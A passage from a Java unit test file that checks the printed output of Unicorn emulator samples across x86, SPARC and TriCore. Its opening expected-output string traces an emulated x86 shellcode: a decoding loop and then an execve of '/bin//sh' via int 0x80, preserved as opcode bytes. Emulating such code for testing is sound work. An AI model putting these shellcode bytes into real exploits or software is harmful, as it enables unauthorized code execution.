0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x100000d, instruction size = 0x4\n" + "*** EIP = 100000d ***: 66 5 3 3 \n" + "Tracing instruction at 0x1000011, instruction size = 0x2\n" + "*** EIP = 1000011 ***: 89 2 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x1000005, instruction size = 0x2\n" + "*** EIP = 1000005 ***: 8b 2 \n" + "Tracing instruction at 0x1000007, instruction size = 0x4\n" + "*** EIP = 1000007 ***: 66 3d ca 7d \n" + "Tracing instruction at 0x100000b, instruction size = 0x2\n" + "*** EIP = 100000b ***: 75 6 \n" + "Tracing instruction at 0x1000013, instruction size = 0x2\n" + "*** EIP = 1000013 ***: fe c2 \n" + "Tracing instruction at 0x1000015, instruction size = 0x5\n" + "*** EIP = 1000015 ***: 3d 41 41 41 41 \n" + "Tracing instruction at 0x100001a, instruction size = 0x2\n" + "*** EIP = 100001a ***: 75 e9 \n" + "Tracing instruction at 0x100001c, instruction size = 0x2\n" + "*** EIP = 100001c ***: ff e6 \n" + "Tracing instruction at 0x1000023, instruction size = 0x2\n" + "*** EIP = 1000023 ***: 31 d2 \n" + "Tracing instruction at 0x1000025, instruction size = 0x2\n" + "*** EIP = 1000025 ***: 6a b \n" + "Tracing instruction at 0x1000027, instruction size = 0x1\n" + "*** EIP = 1000027 ***: 58 \n" + "Tracing instruction at 0x1000028, instruction size = 0x1\n" + "*** EIP = 1000028 ***: 99 \n" + "Tracing instruction at 0x1000029, instruction size = 0x1\n" + "*** EIP = 1000029 ***: 52 \n" + "Tracing instruction at 0x100002a, instruction size = 0x5\n" + "*** EIP = 100002a ***: 68 2f 2f 73 68 \n" + "Tracing instruction at 0x100002f, instruction size = 0x5\n" + "*** EIP = 100002f ***: 68 2f 62 69 6e \n" + "Tracing instruction at 0x1000034, instruction size = 0x2\n" + "*** EIP = 1000034 ***: 89 e3 \n" + "Tracing instruction at 0x1000036, instruction size = 0x1\n" + "*** EIP = 1000036 ***: 52 \n" + "Tracing instruction at 0x1000037, instruction size = 0x1\n" + "*** EIP = 1000037 ***: 53 \n" + "Tracing instruction at 0x1000038, instruction size = 0x2\n" + "*** EIP = 1000038 ***: 89 e1 \n" + "Tracing instruction at 0x100003a, instruction size = 0x2\n" + "*** EIP = 100003a ***: cd 80 \n" + ">>> 0x100003c: interrupt 0x80, EAX = 0xb\n" + "Tracing instruction at 0x100003c, instruction size = 0x1\n" + "*** EIP = 100003c ***: 41 \n" + "Tracing instruction at 0x100003d, instruction size = 0x1\n" + "*** EIP = 100003d ***: 41 \n" + "Tracing instruction at 0x100003e, instruction size = 0x1\n" + "*** EIP = 100003e ***: 41 \n" + "Tracing instruction at 0x100003f, instruction size = 0x1\n" + "*** EIP = 100003f ***: 41 \n" + "Tracing instruction at 0x1000040, instruction size = 0x1\n" + "*** EIP = 1000040 ***: 41 \n" + "Tracing instruction at 0x1000041, instruction size = 0x1\n" + "*** EIP = 1000041 ***: 41 \n" + "Tracing instruction at 0x1000042, instruction size = 0x1\n" + "*** EIP = 1000042 ***: 41 \n" + "Tracing instruction at 0x1000043, instruction size = 0x1\n" + "*** EIP = 1000043 ***: 41 \n" + "\n" + ">>> Emulation done.\n", outContent.toString()); } @Test public void testSparc() { assumeTrue(Unicorn.arch_supported(UC_ARCH_SPARC)); samples.Sample_sparc.test_sparc(); assertEquals( "Emulate SPARC code\n" + ">>> Tracing basic block at 0x10000, block size = 0x4\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> G3 = 0x79b9\n", outContent.toString()); } @Test public void testTricore() { assumeTrue(Unicorn.arch_supported(UC_ARCH_TRICORE)); samples.Sample_tricore.test_tricore(); assertEquals( "Emulate TriCore code\n" + ">>> Tracing basic block at 0x10000, block size = 0x6\n" + ">>> Tracing instruction at 0x10000, instruction size = 0x2\n" + ">>> Tracing instruction at 0x10002, instruction size = 0x4\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> d0 = 0x8000\n" + ">>> d1 = 0x1\n", outContent.toString()); } @Test public void testX86_16() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_x86_16(); assertEquals( "Emulate x86 16-bit code\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> Read 1 bytes from [0xb] = 0x7\n", outContent.toString()); } @Test public void testX86MissCode() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_miss_code(); assertEquals( "Emulate i386 code - missing code\n" + ">>> Allocating block at 0x1000000 (0x1000000), block size = 0x1 (0x1000)\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x2\n" + ">>> Tracing instruction at 0x1000001, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x6\n" + ">>> Tracing instruction at 0x1000002, instruction size = 0x4\n" + ">>> --- EFLAGS is 0x12\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> ECX = 0x1235\n" + ">>> EDX = 0x788f\n", outContent.toString()); } @Test public void testX86() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386(); assertEquals( "Emulate i386 code\n" + ">>> Tracing basic block at 0x1000000, block size = 0x6\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x2\n" + ">>> Tracing instruction at 0x1000001, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x6\n" + ">>> Tracing instruction at 0x1000002, instruction size = 0x4\n" + ">>> --- EFLAGS is 0x12\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> ECX = 0x1235\n" + ">>> EDX = 0x788f\n" + ">>> XMM0 = 0x00112233445566778899aabbccddeeff\n" + ">>> Read 4 bytes from [0x1000000] = 0xf664a41\n", outContent.toString()); } @Test public void testX86MapPtr() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_map_ptr(); assertEquals( "Emulate i386 code - use uc_mem_map_ptr()\n" + ">>> Tracing basic block at 0x1000000, block size = 0x6\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x2\n" + ">>> Tracing instruction at 0x1000001, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x6\n" + ">>> Tracing instruction at 0x1000002, instruction size = 0x4\n" + ">>> --- EFLAGS is 0x12\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> ECX = 0x1235\n" + ">>> EDX = 0x788f\n" + ">>> Read 4 bytes from [0x1000000] = 0xf664a41\n", outContent.toString()); } @Test public void testX86InOut() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_inout(); assertEquals( "Emulate i386 code with IN/OUT instructions\n" + ">>> Tracing basic block at 0x1000000, block size = 0x7\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x2\n" + ">>> Tracing instruction at 0x1000001, instruction size = 0x2\n" + ">>> --- EFLAGS is 0x2\n" + "--- reading from port 0x3f, size: 1, address: 0x1000001\n" + ">>> Tracing instruction at 0x1000003, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x2\n" + ">>> Tracing instruction at 0x1000004, instruction size = 0x2\n" + ">>> --- EFLAGS is 0x96\n" + "--- writing to port 0x46, size: 1, value: 0xf1, address: 0x1000004\n" + "--- register value = 0xf1\n" + ">>> Tracing instruction at 0x1000006, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x96\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> EAX = 0x12f1\n" + ">>> ECX = 0x678a\n", outContent.toString()); } @Test public void testX86ContextSave() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_context_save(); assertEquals( "Save/restore CPU context in opaque blob\n" + ">>> Running emulation for the first time\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> EAX = 0x2\n" + ">>> Saving CPU context\n" + ">>> Running emulation for the second time\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> EAX = 0x3\n" + ">>> CPU context restored. Below is the CPU context\n" + ">>> EAX = 0x2\n" + ">>> CPU context restored with modification. Below is the CPU context\n" + ">>> EAX = 0xc8\n", outContent.toString()); } @Test public void testX86Jump() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_jump(); assertEquals( "Emulate i386 code with jump\n" + ">>> Tracing basic block at 0x1000000, block size = 0x2\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x2\n" + ">>> --- EFLAGS is 0x2\n" + ">>> Emulation done. Below is the CPU context\n", outContent.toString()); } @Test public void testX86Loop() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_loop(); assertEquals( "Emulate i386 code that loop forever\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> ECX = 0x1235\n" + ">>> EDX = 0x788f\n", outContent.toString()); } @Test public void testX86InvalidMemRead() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_invalid_mem_read(); assertEquals( "Emulate i386 code that read from invalid memory\n" + ">>> Tracing basic block at 0x1000000, block size = 0x8\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x6\n" + ">>> --- EFLAGS is 0x2\n" + "uc.emu_start failed as expected: " + "unicorn.UnicornException: Invalid memory read (UC_ERR_READ_UNMAPPED)\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> ECX = 0x1234\n" + ">>> EDX = 0x7890\n", outContent.toString()); } @Test public void testX86InvalidMemWrite() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_invalid_mem_write(); assertEquals( "Emulate i386 code that write to invalid memory\n" + ">>> Tracing basic block at 0x1000000, block size = 0x8\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x6\n" + ">>> --- EFLAGS is 0x2\n" + ">>> Missing memory is being WRITE at 0xaaaaaaaa, data size = 4, data value = 0x1234\n" + ">>> Tracing instruction at 0x1000006, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x2\n" + ">>> Tracing instruction at 0x1000007, instruction size = 0x1\n" + ">>> --- EFLAGS is 0x6\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> ECX = 0x1235\n" + ">>> EDX = 0x788f\n" + ">>> Read 4 bytes from [0xaaaaaaaa] = 0x1234\n" + ">>> Failed to read 4 bytes from [0xffffffaa]\n", outContent.toString()); } @Test public void testX86JumpInvalid() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_jump_invalid(); assertEquals( "Emulate i386 code that jumps to invalid memory\n" + ">>> Tracing basic block at 0x1000000, block size = 0x5\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x5\n" + ">>> --- EFLAGS is 0x2\n" + "uc.emu_start failed as expected: " + "unicorn.UnicornException: Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> ECX = 0x1234\n" + ">>> EDX = 0x7890\n", outContent.toString()); } @Test public void testX86_64() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_x86_64(); assertEquals( "Emulate x86_64 code\n" + ">>> Tracing basic block at 0x1000000, block size = 0x4b\n" + ">>> Tracing instruction at 0x1000000, instruction size = 0x6\n" + ">>> RIP is 0x1000000\n" + ">>> Tracing instruction at 0x1000006, instruction size = 0x3\n" + ">>> RIP is 0x1000006\n" + ">>> Tracing instruction at 0x1000009, instruction size = 0x1\n" + ">>> RIP is 0x1000009\n" + ">>> Tracing instruction at 0x100000a, instruction size = 0x4\n" + ">>> RIP is 0x100000a\n" + ">>> Tracing instruction at 0x100000e, instruction size = 0x3\n" + ">>> RIP is 0x100000e\n" + ">>> Tracing instruction at 0x1000011, instruction size = 0x1\n" + ">>> RIP is 0x1000011\n" + ">>> Tracing instruction at 0x1000012, instruction size = 0x7\n" + ">>> RIP is 0x1000012\n" + ">>> Memory is being WRITE at 0x11ffff8, data size = 8, data value = 0x3c091e6a\n" + ">>> Memory is being READ at 0x11ffff8, data size = 8\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> RAX = 0xdb8ee18208cd6d03\n" + ">>> RBX = 0xd87b45277f133ddb\n" + ">>> RCX = 0x3c091e6a\n" + ">>> RDX = 0x25b8d5a4dbb38112\n" + ">>> RSI = 0xb3db18ac5e815ca7\n" + ">>> RDI = 0x48288ca5671c5492\n" + ">>> R8 = 0xec45774f00c5f682\n" + ">>> R9 = 0xc118b68e7fcfeeff\n" + ">>> R10 = 0x596b8d4f\n" + ">>> R11 = 0xe17e9dbec8c074aa\n" + ">>> R12 = 0x595f72f6b9d8cf32\n" + ">>> R13 = 0xea5b108cc2b9ab1f\n" + ">>> R14 = 0x595f72f6e4017f6e\n" + ">>> R15 = 0x3e04f60c8f7ecbd7\n", outContent.toString()); } @Test public void testX86_64Syscall() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_x86_64_syscall(); assertEquals( "Emulate x86_64 code with 'syscall' instruction\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> RAX = 0x200\n", outContent.toString()); } @Test public void testX86InvalidMemReadInTb() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_invalid_mem_read_in_tb(); assertEquals( "Emulate i386 code that read invalid memory in the middle of a TB\n" + "uc.emu_start() failed BY DESIGN with error returned: " + "unicorn.UnicornException: Invalid memory read (UC_ERR_READ_UNMAPPED)\n" + ">>> Emulation done. Below is the CPU context\n" + ">>> EIP = 0x1000001\n" + ">>> The PC is correct after reading unmapped memory in the middle of TB.\n", outContent.toString()); } @Test public void testX86SmcXor() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_smc_xor(); assertEquals( "Emulate i386 code that modfies itself\n" + ">>> Emulation done. Below is the result.\n" + ">>> SMC emulation is correct. 0x3ea98b13 ^ 0xbc4177e6 = 0x82e8fcf5\n", outContent.toString()); } @Test public void testX86Mmio() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_mmio(); assertEquals( "Emulate i386 code that uses MMIO\n" + ">>> Write value 0x3735928559 to IO memory at offset 0x4 with 0x4 bytes\n" + ">>> Read IO memory at offset 0x4 with 0x4 bytes and return 0x19260817\n" + ">>> Emulation done. ECX=0x19260817\n", outContent.toString()); } @Test public void testX86HookMemInvalid() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86.test_i386_hook_mem_invalid(); assertEquals( "Emulate i386 code that triggers invalid memory read/write.\n" + ">>> We have to add a map at 0x8000 before continue execution!\n" + ">>> We have to add a map at 0x10000 before continue execution!\n", outContent.toString()); } @Test public void testX86Mmr() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86_mmr.test_x86_mmr(); assertEquals( "Test x86 MMR read/write\n" + ">>> EAX = 0xdddddddd\n" + ">>> LDTR.base = 0x22222222\n" + ">>> LDTR.limit = 0x33333333\n" + ">>> LDTR.flags = 0x44444444\n" + ">>> LDTR.selector = 0x5555\n" + "\n" + ">>> GDTR.base = 0x77777777\n" + ">>> GDTR.limit = 0x8888\n", outContent.toString()); } @Test public void testX86Gdt() { assumeTrue(Unicorn.arch_supported(UC_ARCH_X86)); samples.Sample_x86_mmr.gdt_demo(); 